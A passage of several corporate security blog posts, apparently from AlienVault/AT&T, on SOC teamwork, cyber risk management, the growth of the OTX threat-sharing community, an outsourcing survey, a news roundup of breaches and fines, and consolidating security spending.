High expertise and seamless teamwork are important to effectively curtail the dangers of cyber-attacks and navigate the cyber field safely and in a timely manner. Many SOCs might have dedicated Tier 1/2 analysts, who can change tires and refuel seamlessly on the usual runbook procedures for many common or predictable cyber threats, but they are not experts in managing larger scale incidents like a blown gasket or jammed piston, which requires the response of a more experienced mechanical team or, in cyber, Tier 3/4 analysts. These are highly trained specialized professionals with in-depth experience who are able to tackle complex, unusual incidents and attacks under severe time pressure.

For example, sometimes cyber-attacks cannot be detected, deflected or blocked before they begin. Then it is the SOC’s responsibility to contain and protect as well as investigate and conduct a meticulous analysis for preventing similar incidents, through a dedicated Forensics Team. The Forensics Team of a SOC is dedicated to evaluating necessary damage repair and implementing novel or near-real-time responses.

The core trade for a professional is the old saying “practice makes perfect”. It’s a simple question of constantly getting your hands dirty with the nitty-gritty work; repeatedly executing complex tasks in as versatile an environment as possible is the only way to become a professional and the only way to stay one.

Not all security issues are as dramatic as a direct attack; some are measured in how “ready” your organization is for the “when” scenarios. In the race to being secure, organizations many times fail to properly calibrate or stay up to date with internal components - whether it is infrastructure or personnel.
A dedicated SOC has an Onboarding Team that ensures that specific security and IT elements like Security Incident Event Management systems, or SIEMs, are properly configured and calibrated, and that employees are properly trained to understand, analyze and act on their output.

Just like a Formula 1 team, when a SOC has a solid, strong and professional cybersecurity team, the synergy in the teamwork ensures optimal performance and protection within the dynamic and complex cybersecurity world. Professionalism is the key to effectively curtailing the dangers of cyber-attacks. Ensuring a complete, professional and experienced team is what turns an ordinary team into a winning team. As it is said, "The whole is only as good as the sum of its parts".

Register for our webinar on Thursday, November 8th at 1pm CST to learn more about how professional SOCs are designed, built and operated.
I attended the Cybersecurity Summit in Phoenix recently and presented on the topic of minimizing risk. There were some great conversations around the value of risk management within the cyber threat landscape. Here are some of my musings from the event.

We are now at the forefront of a world of digital transformation. Beyond being a buzzword, digital is part and parcel of our daily lives today. According to the World Economic Forum report earlier this year, cyber-attacks and data theft/fraud bubbled up to number two and three of the top five threats in terms of likelihood of occurrence, and cyber risks intensified. With the scale of attacks today, along with the ingrained expectation that you’re either an organization that has been breached or you’re going to be, there is a lot of chatter about investments being made in cybersecurity technologies and how breaches still happen. Prevention is now being balanced with detection and response. Given this, the focus has turned to the need for cyber to be addressed as a business challenge, and measurement of risk is key.

Before you go ahead with a cybersecurity investment plan for 2019, consider answering the questions below.

• What are your top 5 cyber risks based on priority?
• Can you describe the actual loss impact in business terms for each of your top 5 risks?
• How are these cyber risk impacts aligned to your risk appetite?
• Are you truly reporting on cyber risks, or is it compliance driven with reporting on control effectiveness?
• Have you considered how you plan to deal with the current risks and emerging risks, and treat these risks on an ongoing basis?

A common business edict is: “If we can measure it, we can manage it.” In the security space, the term GRC (Governance, Risk and Compliance) is common, but typically most organizations have been driven by the compliance focus. Spending has been primarily compliance driven, and along the way, too many risk assessments have been conducted with a checklist approach.
As you plan for the 2019 cybersecurity budget, here are four handy tips to consider that can help cut to the core of cyber risk management.

1. Risk counts, but don’t just be counting

Counting all the risks – as an end – is just a part of thorough risk identification. The question is not, in any case, how many risks you can think up, but what is relevant to your business, i.e. what exactly the key vulnerabilities are in achieving your business objectives.

2. Ongoing debate of Qualitative versus Quantitative

The key here is structured versus abstract. You must be able to measure the risk and quantify it. However, if your organization is going the qualitative route, keep in mind you must back the risk with data to differentiate the levels of risk. After you have conducted a meaningful risk assessment to identify the inherent risks faced because of the business you do, the next step will be to understand what risk mitigation strategies are required, with what priority, invoking what resources.

3. Continuous Cyber Risk Monitoring

Cyber risk presents a moving target as organizations undergo major transformations by accelerating cloud adoption, increasing digital transformation investments, and advancing data analytics sophistication. As these transformations continuously grow the digital footprint, they outpace the security protections companies have in place.

4. Know your Risk Appetite

Cyber risks are impossible to eliminate, resources are finite, risk profiles are ever-changing, and getting close to secure is elusive. The current level of controls for security and privacy that are effective in reducing cyber risk to an acceptable level today will inevitably become inadequate in the future – even sooner than many may realize. It is a truism that different types of risk require different types of defensive strategies.
A more specific idea is that defensive measures should be proportionate in cost to the potential harm that may be suffered through a data breach and the likelihood of that breach occurring. The key is to balance risk versus reward.

Conclusion

Risk management is at a fascinating point in its evolution. It is now recognized to be not only fundamental to an organization’s financial stability and regulatory compliance, but also an essential part of the cybersecurity strategy. Defining the best security measures can be difficult because each organization has different goals, requirements, and tolerance for risk. All organizations need to assess what they have in place today, review where they want to be in the future, and build a roadmap that will help them reduce their risk as their business expands.

How are you able to identify and address new risks quickly while you deliver new technologies? I would love to hear successful techniques and insights on your partnership with finance, operations, and the businesses as we move to the risk function of the future.
Today, I’m excited to announce that AlienVault® Open Threat Exchange® (OTX™) has grown to 100,000 global participants, representing 36 percent year-over-year growth. AlienVault OTX, launched in 2012, is the world’s first free threat intelligence community that enables real-time collaboration between security researchers and IT security practitioners from around the world. Every day, participants from more than 140 countries contribute 19 million pieces of threat data to the community. OTX enables companies and government agencies to gather and share relevant, timely, and accurate information about new or ongoing cyber-attacks and threats as quickly as possible to avoid major breaches (or minimize the damage from an attack).

As Russell Spitler, SVP of Product for AlienVault, an AT&T company, explains, “Attackers rely on isolation - they benefit when defenders don’t talk to each other. We can’t be everywhere at once, but they can learn from each other’s experience. With the growth in OTX membership, we all benefit from the diversity of threat intelligence from an even wider variety of participants.”

To provide big-picture perspective on the billions of security artifacts contributed to OTX this year, AlienVault Security Advocate Javvad Malik and Threat Engineer Chris Doman have created the OTX Trends Report for 2018 Q1 and Q2. Like the 2017 report, this analysis reveals trends across exploits, malware, and threat actors, including top-ten rankings of the most seen exploits and adversaries recorded in vendor reports. The analysis reveals changes in the threat landscape, including a shift in the most reported exploits. For example, this year’s report reveals a rise in server exploits, as well as marking the first time an exploit targeting IoT devices (GPON routers) has made the list of most-seen exploits.
Encouragingly, the OTX Trends Report shows an uptick in information sharing across the InfoSec industry, including a plethora of independent research sharing on Twitter. According to the report, “As more companies and researchers look at ways to share threat data, we see more usable and useful information flow into OTX. This openness and collaboration has resulted not only in organisations being able to defend themselves better - but increasing circles of trust within the industry where actual threat intelligence is being shared more openly. A trend that we have seen grow over the years.”

The sheer volume of security events included in the OTX Trends Report reflects the importance of keeping up with the latest threat intelligence. Without threat sharing, malicious actors can easily reuse effective exploits and pivot their attacks from target to target. A campaign affecting the UK legal industry can be repurposed for bankers in the United States, while security researchers operating in silos start from scratch each time. For example, the OTX Trends Report shows that the most commonly reported exploit, CVE-2017-11882, has been reused widely.

By joining OTX, participants can strengthen their defenses and share real-time information about emerging threats, attack methods, and malicious actors. The diversity of OTX participants representing different countries, industries, and organization sizes provides every community member with a more comprehensive set of data, enabling better threat detection. Beyond participant-contributed threat indicators, the OTX community also benefits from the robust threat data provided by AlienVault’s broad network of OTX partners, including Intel, Microsoft MAPP, Cyber Threat Alliance, QiHoo360, Telefonica, Hewlett-Packard Enterprise, and more. OTX partner contributions enrich the threat intelligence data available within the community and support the analytics available to OTX participants.
This collaboration across the InfoSec industry provides added assurance that participants have the information they need to detect the latest threats as they emerge. In addition, OTX can serve as a STIX/TAXII provider and platform, enabling ISACs and other threat intelligence providers to share their curated threat intelligence through STIX/TAXII to their devices or to their customers.

AlienVault has made it easier than ever to leverage OTX data to detect and respond to threats in your own environment. Earlier this year, we introduced OTX Endpoint Security™, a free service in OTX that allows anyone to quickly identify threats by scanning their critical endpoints. OTX participants can use the osquery-based AlienVault Agent to scan their endpoints for the presence of known indicators of compromise catalogued in OTX. For example, when a major attack like Petya or WannaCry occurs, OTX participants can run queries against the latest threat data in OTX pulses to find out if their endpoints have been compromised, without requiring additional security products. OTX Endpoint Security is available to all registered OTX participants at no cost.

For users of AlienVault USM Anywhere™, OTX provides even deeper benefits. AlienVault USM Anywhere consumes OTX threat data in multiple ways, enabling busy security teams to detect and respond to the latest global threats as they emerge, without extra cost or effort. As Lee Thomas Hagen, Strategic Consulting, Dataprise, Inc. explains, "With AlienVault we have been able to reduce lag times by not having to invest into specialized research for which we rely on AlienVault Security Labs and OTX."

The AlienVault Labs Security Research Team consumes OTX threat data, applying machine learning and human analysis to validate and expand on the threat scenarios. The team uses this intelligence to curate and deliver continuous threat intelligence updates to USM Anywhere.
USM Anywhere users can subscribe to OTX threat data and use it directly for correlation with any connected data source. Whether integrated directly with USM Anywhere or synchronized with your other security products through the OTX DirectConnect API, emerging threat data from OTX can help your team keep up with the ever-changing threat landscape.

According to Christian B. Caldarone, Information Security Officer at Deutsche Post Dialog Solutions GmbH, "AlienVault USM is very effective in detecting real security threats, as their OTX integrated threat intelligence has a very good reputation in the industry. Thanks to its being open to others too, other heavyweight champions like the Bro security monitor can integrate the OTX feed too (yes and this is done by many security people out there). This says more than words."

Additional Resources:

Read the OTX Trends Report for 2018 Q1 and Q2
Join the AlienVault Open Threat Exchange today
New! Free Threat Hunting Service from AlienVault – OTX Endpoint Security™
Learn more about threat intelligence in USM Anywhere
Take USM Anywhere for a test drive in the online demo
We love conducting surveys at conferences. Not only do we gain insights from some of the smartest people in attendance, but we get a few extra minutes to mingle and get to know them better. So, while we were at SpiceWorld in Austin this year, we sought to capture thoughts on outsourcing security. Of the attendees, 380 participated in our survey to bring us the following insights.

How Much is Outsourced?

The first question was to establish a baseline as to how security operations programs are currently sourced. A majority, at 60 percent, run security operations completely in-house. On the other side of the spectrum, a shade under 5 percent of participants’ companies completely outsource security operations. The remaining participants outsource some aspects of their security operations, with most keeping the majority of functions in-house.

Attitudes Towards Outsourcing

The question that then arises is how participants felt about outsourcing security operations as a whole. Just over a quarter, 26 percent, believed that security should never be outsourced. However, 41 percent believed that security operations should be outsourced as much as possible, as long as the service provider is good. Perhaps the key point here is the caveat about the quality of the service provider. Companies looking to outsource any aspect of their security operations should vet potential providers and gain assurance that the provider is fulfilling its part of the deal. Gaining that assurance can take many forms. At a simple level it could be unplugging a server and waiting to see how long it takes for the provider to notice. Alternatively, at the risk of sounding like Jeremiah Grossman, the right incentives are needed here, be that in the form of the vendor providing some warranty, or even insurance.

Another aspect which we did not go into was the set of drivers that lead companies to outsource. The skills gap is an important discussion point.
Many companies don’t have the right staff, or the right number of staff internally, to fulfill the increasing needs. According to the 2018 (ISC)2 Cybersecurity Workforce Study, there is a shortage of nearly 3 million cybersecurity professionals. Another factor could be that many security operations tools, technologies, and processes have become increasingly standardised over the years. This standardisation allows companies to outsource certain aspects of security operations in a relatively commoditised manner.

Budgets

In an attempt to get an indication as to the direction the market is heading, we sought to understand budgets and future spending trends. The majority of participants believe that the return on investment is justified when outsourcing security. This should not be surprising for most security operations tasks that have good economies of scale. Furthermore, both in-house and outsourced security operations budgets are largely looking to increase. For in-house security operations, 33 percent reported a planned increase in budget over the coming year, and 25 percent are looking to spend more on outsourcing security operations.

Conclusion

In a short survey with a limited audience set, it is difficult to draw hard and definitive conclusions, but it does provide some good indicators that are worth exploring. Compared to a few years ago, there appears to be greater acceptance and adoption of managed security partners to handle security operations. This trend looks set to increase with a combination of factors including a skills shortage, standardisation of security operations technologies and processes, and an increased level of confidence in the services and monetary value offered by service providers.
WordPress Wants to Erase its Past

I was just flexing my clickbait title muscles with the heading here. But according to a talk at DerbyCon, the WordPress security team stated its biggest battle is not against hackers but its own users, millions of whom continue to run sites on older versions of the CMS, and who regularly fail to apply updates to the CMS core, plugins, or themes.

WordPress team working on "wiping older versions from existence on the internet" | ZDNet

The Penalties Keep Rolling In

Looks like the regulators have recently seen the Arnie classic, Pumping Iron, as they flex their muscles to penalise companies for lax security. First up, supermarket giant Morrisons has been told by the Court of Appeal that it is liable for the actions of a malicious insider who breached data on 100,000 employees, setting up a potential hefty class action pay-out.

Morrisons Loses Insider Breach Liability Appeal | InfoSecurity Magazine

In other news, Facebook has been fined £500,000 by the UK's data protection watchdog for its role in the Cambridge Analytica data scandal. The Information Commissioner's Office (ICO) said Facebook had let a "serious breach" of the law take place. The fine is the maximum allowed under the old data protection rules that applied before GDPR took effect in May.

Facebook fined £500,000 for Cambridge Analytica scandal | BBC

Breaches at 32,000 Feet

Cathay Pacific has admitted that personal data on up to 9.4 million passengers, including their passport numbers, has been accessed by unauthorised personnel in the latest security screw-up to hit the airline industry.

Cathay Pacific hack: Personal data of up to 9.4 million airline passengers laid bare | The Register

British Airways, still encountering turbulence following its hack in September, has revealed that a further 185,000 customer details could have been compromised!

British Airways reveals a further 185,000 users affected in September data hack | City AM

Fool Me Once

Children’s Hospital of Philadelphia has reported two data breaches that occurred in August and September of 2018. On August 24 the hospital discovered that a hacker had accessed a physician’s email account on August 23 via a phishing attack. A second breach, found on September 6, revealed unauthorized access to an additional email account on August 29.

Children’s Hospital of Philadelphia victimized twice by phishing attacks | Health Data Management

Some Notes for Journalists About Cybersecurity

The recent Bloomberg article about Chinese hacking of motherboards is a great opportunity to talk about problems with journalism. Journalism is about telling the truth: not a close approximation of the truth, but the true truth. They don't do a good job at this in cybersecurity.

Some notes for journalists about cybersecurity | Errata Security

CVE-2018-8414: A Case Study in Responsible Disclosure

Vulnerability management and responsible disclosure can be a tricky tightrope to walk at times. But this writeup by Matt Nelson on the process he recently went through is really insightful.

CVE-2018-8414: A Case Study in Responsible Disclosure | Medium, Matt Nelson

What Does it Take to be a CISO?

How do people working in a Chief Information Security Officer (CISO) position or its equivalent view cybersecurity? Which problems do they face? To learn the answers to those questions, Kaspersky Lab surveyed 250 security directors from around the world.

What it takes to be a CISO: Success and leadership in corporate IT security | Kaspersky

The Hunting Cycle and Measuring Success

This is an older article I came across, but the principles are worth going over again.

The Hunting Cycle and Measuring Success | Finding Bad

Other Things I Liked This Week

The Wildly Unregulated Practice of Undercover Cops Friending People on Facebook | The Root
Compassionate—Yet Candid—Code Reviews | YouTube, April Wensel
This is the last in our blog series on security awareness to celebrate National Cyber Security Awareness Month (NCSAM). We decided to take on social media sharing tips, and we tapped the Spiceworks community of IT pros for tips and tricks. We made it a contest, with the winner getting a $200 airline voucher. Here is the winning entry:

We received plenty of other great ideas. One of the prevalent ones was using multi-factor authentication. A second prevalent idea was avoiding social media, which certainly would protect security and privacy, but would possibly also be no fun :( There were also many mentions of using password managers. Clickbait was pointed out as a problem to avoid. Here are some other interesting perspectives.

Even though I couldn't win the contest, I tossed in one of my favorite ways to stay safe online. There was also a very novel way to protect online purchases, but it's so much work!

Thanks to everyone contributing ideas! The original post in Spiceworks is here.
Volume 8 of the AT&T Cyber Insights report looked into whether organizations that are investing more in cybersecurity are achieving better outcomes than those that aren’t. The outcome of the research was a resounding no. On the surface, this may seem counter-intuitive. After all, how many CISOs have you ever heard complain about having too much security? However, if we look at the trend as an inverted U, or the law of diminishing returns, when you overdo something, you eventually stop seeing benefits, and may even see losses.

Getting the Porridge Just Right

Much like Goldilocks, the question that arises is how much security is just right? Wendy Nather, former Director of the Enterprise Security Practice at 451 Research, wanted to establish The Real Cost of Security. In her research, security professionals provided a wide range of responses as to what security technologies are needed, with the majority of the respondents being able to trim down their list to around 10. The pricing of these 10 technologies varied greatly depending on a number of factors such as vendor, mode of deployment, whether it was open source, and so on: the price range varied anywhere from $225,000 to $1.46m in the first year, including technology and staff.

Expense in Depth

For many companies, especially those with small or mid-sized security teams, managing 10 or more individual security products can be challenging. Former Forrester analyst Rick Holland coined the phrase ‘expense in depth’. That is where many companies use the defense in depth concept to justify the need for more security products. The problem with this approach is that it can lead to buying too many technologies which don’t complement each other, which inevitably results in a multi-layered approach that provides minimal return on investment.

This leads us to a bit of an impasse. A variety of security controls are needed to provide adequate coverage. But too many security products lead to an increase in expense, not just to procure but to manage, which can lead to security shelfware.

More Capability in Fewer Products

In order to avoid some of these pitfalls, companies, especially ones with small to mid-sized security teams, should look to invest in fewer products that offer greater functionality. The good news is that many security technologies have become standardised and no longer need to be acquired or deployed individually. For example, vulnerability scanning is largely a standardised function. While some scanners may perform better than others, by and large you can point one at your assets and receive an expected output. So, the question companies should ask is: what benefits are being gained by running vulnerability scanning as a separate service with a standalone technology? Compare this to a platform which offers several security functions, of which vulnerability scanning is one. The same could be said for anti-virus, IDS, or SIEMs. The value in running any of these as dedicated standalone services is diminishing.

Take the example of your smartphone. It has combined many devices, such as a pager, phone, camera, even a flashlight, into one device. One could argue that a standalone dedicated camera or flashlight is a superior product, which may be true, but it comes with the overhead of additional batteries and carrying those devices around.

Getting a Helping Hand

In addition to reducing the number of disparate security products, companies can also take advantage of managed security providers that can complement their teams’ security capabilities. This can be a good approach to offload non-critical monitoring tasks, so that the in-house security team can focus solely on protecting the crown jewels within the organisation. One of the additional benefits of this approach is that it takes away the process of choosing the right technology, too. The MSSP will monitor logs and alert you if there is something that warrants further investigation. Think of it like your energy provider. You may not know how your provider is generating electricity (maybe it’s burning coal, or using wind farms, solar energy, or some other option), but the end result is the same: you receive a consistent supply of electricity into your home.

Insurance

The third leg of the stool could be cyber insurance. This is perhaps of more importance for smaller companies wanting to do business with large enterprises, which may insist on cyber insurance in the event of an incident or a breach. As companies rely more and more on their digital infrastructure, any disruption has a greater impact on the bottom line. Ransomware can grind businesses to a halt, and a leak of sensitive documents can have far-reaching consequences such as damaging critical business relationships.

Managing the Risk

Ultimately, cybersecurity boils down to managing risk. As Todd Waskelis, AVP at AT&T cybersecurity solutions, said, “It’s not about the number of dollars an organisation spends that leads to them reducing risk. It’s whether you have approached this from a business perspective and you have a risk management program that will not go stale.” Having a business-focused risk management plan doesn’t mean having all of the best security technologies in place. Sometimes it means having enough of the right security technologies in place, having the right partners, and even transferring some of the risk via cyber insurance.

Considerations for your security strategy:
Consolidate your security tools
Outsource functions to an MSSP
Transfer some risks via cyber insurance